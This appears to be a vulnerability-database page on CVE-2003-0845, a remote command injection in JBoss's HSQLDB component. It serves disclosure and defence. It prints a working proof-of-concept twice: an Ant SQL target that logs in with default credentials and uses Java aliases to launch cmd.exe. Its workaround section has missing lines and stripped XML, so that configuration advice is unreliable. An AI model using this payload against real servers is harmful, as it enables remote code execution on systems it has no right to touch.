CVE-2003-0845
CVSS 7.5
Published: 2003-11-17 00:00:00
Last revised: 2016-10-17 22:37:56

[Original] Unknown vulnerability in the HSQLDB component in JBoss 3.2.1 and 3.0.8 on Java 1.4.x platforms, when running in the default configuration, allows remote attackers to conduct unauthorized activities and possibly execute arbitrary code via certain SQL statements to (1) TCP port 1701 in JBoss 3.2.1, and (2) port 1476 in JBoss 3.0.8.


[CNNVD] JBoss HSQLDB remote command injection vulnerability (CNNVD-200311-071)

        
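        JBoss J2EE is a Java application server.
        Arbitrary commands can be injected remotely into JBoss through its HSQLDB component; a remote attacker can exploit this vulnerability to take control of the entire system.
        The command injection vulnerability exists in the JBoss server component HSQLDB (the SQL database that manages JMS connections). Because of programming errors in the sun.* classes and logic errors in the org.apache.* classes, a remote attacker can submit crafted SQL commands to the service, alter the system's original SQL logic, and execute arbitrary commands on the system with the privileges of the Java process.
        The JBoss server is also affected by several other vulnerabilities, including denial of service, log manipulation and information disclosure.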
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

oval:org.mitre.oval:def:11300 Unknown vulnerability in the HSQLDB component in JBoss 3.2.1 and 3.0.8 on Java 1.4.x platforms, when running in the default configuration, a...
oval:org.mitre.oval:def:22393 ELSA-2007:1048: openoffice.org, hsqldb security update (Moderate)
*OVAL describes in detail how to detect this vulnerability; further technical details on detection can be found in the related OVAL definitions.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0845
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0845
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-071
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=106546044416498&w=2
(UNKNOWN)  BUGTRAQ  20031005 JBoss 3.2.1: Remote Command Injection
http://marc.info/?l=bugtraq&m=106547728803252&w=2
(UNKNOWN)  BUGTRAQ  20031006 Update JBoss 308 & 321: Remote Command Injection
http://sourceforge.net/docman/display_doc.php?docid=19314&group_id=22866
(UNKNOWN)  CONFIRM  http://sourceforge.net/docman/display_doc.php?docid=19314&group_id=22866
http://www.redhat.com/support/errata/RHSA-2007-1048.html
(UNKNOWN)  REDHAT  RHSA-2007:1048
http://www.securityfocus.com/bid/8773
(VENDOR_ADVISORY)  BID  8773

- Vulnerability information

JBoss HSQLDB remote command injection vulnerability
High risk  Unknown
2003-11-17 00:00:00 2005-10-20 00:00:00
Remote
        
        

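- Advisories and patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Change the following line in the configuration file: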
        
        
        jdbc:hsqldb:hsql://localhost:1701
        

        to:
        
        Then delete or comment out the following section:
        
                name="jboss:service=Hypersonic">
        1701
        true
        default
        false
        true
        

        Vendor patch:
        JBoss Group
        -----------
        The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:
        
        http://www.jboss.org/

- Vulnerability information (23221)

JBoss 3.0.8/3.2.1 HSQLDB Remote Command Injection Vulnerability (EDBID:23221)
multiple remote
2003-10-06 Verified
0 Marc Schoenefeld
N/A
source: http://www.securityfocus.com/bid/8773/info

A remote command-injection vulnerability has been reported in JBoss. The issue is reportedly exposed via the HSQLDB component, which is a SQL database server that manages JMS connections. Because of a number of flaws, an attacker can pass commands to the HSQLDB component via the port it listens on. Note that the port may vary between versions; by default it is 1701/TCP for JBoss 3.2.1 and 1476/TCP for 3.0.8.

Attackers can exploit this issue to mount a number of attacks, including execution of database commands, denial-of-service attacks, log manipulation, information disclosure, and execution of operating system commands on some supported platforms.

This issue is reported to exist with JBoss 3.2.1/3.0.8 on any Java 1.4.x-enabled platforms. Other versions may also be affected. 

<target name="cmdinject">
<sql
classpath="hsqldb.jar"
driver="org.hsqldb.jdbcDriver"
url="jdbc:hsqldb:hsql://${host}:${port}"
userid="sa"
password=""
print = "true"
>
CREATE ALIAS COMPDEBUG FOR
"org.apache.xml.utils.synthetic.JavaUtils.setDebug"
CREATE ALIAS SETPROP FOR "java.lang.System.setProperty";
CREATE ALIAS COMPILE FOR
"org.apache.xml.utils.synthetic.JavaUtils.JDKcompile";

CALL COMPDEBUG(true);
CALL SETPROP('org.apache.xml.utils.synthetic.javac','cmd.exe');
CALL COMPILE('/c REGEDIT.EXE','');
</sql>
</target> 		

- Vulnerability information

10094
JBoss HSQLDB Component TCP Port SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-10-05 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

JBoss HSQLDB Remote Command Injection Vulnerability
Unknown 8773
Yes No
2003-10-06 12:00:00 2007-12-18 08:05:00
Discovery is credited to Marc Schoenefeld.

- Affected software versions

RedHat Enterprise Linux Optional Productivity Application 5 server
Red Hat Enterprise Linux Desktop 5 client
jBpm.org jBpm 2.0
+ JBoss Group JBoss 3.2.1
JBoss Group JBoss 3.2.1
JBoss Group JBoss 3.0.8
HSQLDB hsqldb 1.8 4

- Vulnerability discussion

A remote command-injection vulnerability has been reported in JBoss. The issue is reportedly exposed via the HSQLDB component, which is a SQL database server that manages JMS connections. Because of a number of flaws, an attacker can pass commands to the HSQLDB component via the port it listens on. Note that the port may vary between versions; by default it is 1701/TCP for JBoss 3.2.1 and 1476/TCP for 3.0.8.

Attackers can exploit this issue to mount a number of attacks, including execution of database commands, denial-of-service attacks, log manipulation, information disclosure, and execution of operating system commands on some supported platforms.

This issue is reported to exist with JBoss 3.2.1/3.0.8 on any Java 1.4.x-enabled platforms. Other versions may also be affected.

- Exploit

The researchers who discovered this vulnerability have developed a working exploit that is not publicly available or known to be circulating in the wild.

The following proof of concept is available:
<target name="cmdinject">
<sql
classpath="hsqldb.jar"
driver="org.hsqldb.jdbcDriver"
url="jdbc:hsqldb:hsql://${host}:${port}"
userid="sa"
password=""
print = "true"
>
CREATE ALIAS COMPDEBUG FOR
"org.apache.xml.utils.synthetic.JavaUtils.setDebug"
CREATE ALIAS SETPROP FOR "java.lang.System.setProperty";
CREATE ALIAS COMPILE FOR
"org.apache.xml.utils.synthetic.JavaUtils.JDKcompile";

CALL COMPDEBUG(true);
CALL SETPROP('org.apache.xml.utils.synthetic.javac','cmd.exe');
CALL COMPILE('/c REGEDIT.EXE','');
</sql>
</target>

- Solution

The vendor has addressed this issue in JBoss 3.2.2 and in the CVS tree of the JBoss 3.0.x tree. The committed CVS change can be found in the appropriate web reference. The vendor has stated that JBoss 3.0.9 is pending release.


JBoss Group JBoss 3.2.1

- Related references

 

 
